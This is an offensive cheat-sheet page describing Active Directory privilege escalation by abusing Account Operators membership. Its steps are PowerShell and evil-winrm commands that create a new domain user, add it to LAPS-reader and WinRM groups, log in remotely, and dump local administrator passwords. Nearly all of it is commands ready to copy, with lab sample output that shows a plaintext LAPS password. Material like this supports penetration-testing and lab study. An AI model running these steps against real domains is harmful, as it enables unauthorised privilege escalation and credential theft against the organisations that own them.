TLDRBins / Account Operators



Privesc #1: Create a new user account and add it to the LAPS (Local Administrator Password Solution) readers group

Members of Account Operators can create user accounts and change the membership of groups that are not protected by AdminSDHolder (so not Domain Admins or Administrators, but typically custom groups such as a LAPS readers group or a WinRM access group). That is what makes the following steps possible.

1. Import PowerView.ps1

. .\PowerView.ps1
Sample Output: *Evil-WinRM* PS C:\programdata> . .\PowerView.ps1

2. Create a cred object (runas) [optional]

$username = '<DOMAIN>\<USER>'
Sample Output: TO-DO
$password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
Sample Output: TO-DO
$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $password
Sample Output: TO-DO

3. Create a new user password object

$new_user_password = ConvertTo-SecureString '<NEW_USER_PASSWORD>' -AsPlainText -Force
Sample Output: *Evil-WinRM* PS C:\programdata> $new_user_password = ConvertTo-SecureString 'Test1234' -AsPlainText -Force

4. Create a new user account

Note: New-AdUser (and Get-AdComputer in step 8) comes from the ActiveDirectory (RSAT) module, not from PowerView, so that module must be available on the host. PowerView's own equivalent for user creation is New-DomainUser.

New-AdUser '<NEW_USER>' -enabled $true -accountpassword $new_user_password -Credential $cred
Sample Output: *Evil-WinRM* PS C:\programdata> New-AdUser 'alice' -enabled $true -accountpassword $new_user_password -Credential $cred

5. Add the new user to LAPS group

Add-DomainGroupMember -Identity 'LAPS READ' -Members '<NEW_USER>' -Credential $cred
Sample Output: *Evil-WinRM* PS C:\programdata> Add-DomainGroupMember -Identity 'LAPS READ' -Members 'alice' -Credential $cred

6. Add the new user to WinRM group

Add-DomainGroupMember -Identity 'WinRM' -Members '<NEW_USER>' -Credential $cred
Sample Output: *Evil-WinRM* PS C:\programdata> Add-DomainGroupMember -Identity WinRM -Credential $cred -Members 'alice'

7. Remote as new user

evil-winrm -i <TARGET> -u '<NEW_USER>' -p '<NEW_USER_PASSWORD>'
Sample Output:
$ evil-winrm -i 127.0.0.1 -u alice -p 'Test1234'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\alice\Documents>

8. Read LAPS password

Get-AdComputer -Filter * -Properties ms-Mcs-AdmPwd
Sample Output: *Evil-WinRM* PS C:\Users\alice\Documents> Get-AdComputer -Filter * -Properties ms-Mcs-AdmPwd DistinguishedName : CN=PIVOTAPI,OU=Domain Controllers,DC=LicorDeBellota,DC=htb DNSHostName : PivotAPI.LicorDeBellota.htb Enabled : True ms-Mcs-AdmPwd : 82SD67Cuq34TPZm4mnFo Name : PIVOTAPI ObjectClass : computer ObjectGUID : 98783674-e6a3-4d9e-87e3-efe5f31fabbf SamAccountName : PIVOTAPI$ SID : S-1-5-21-842165252-2479896602-2762773115-1004 UserPrincipalName :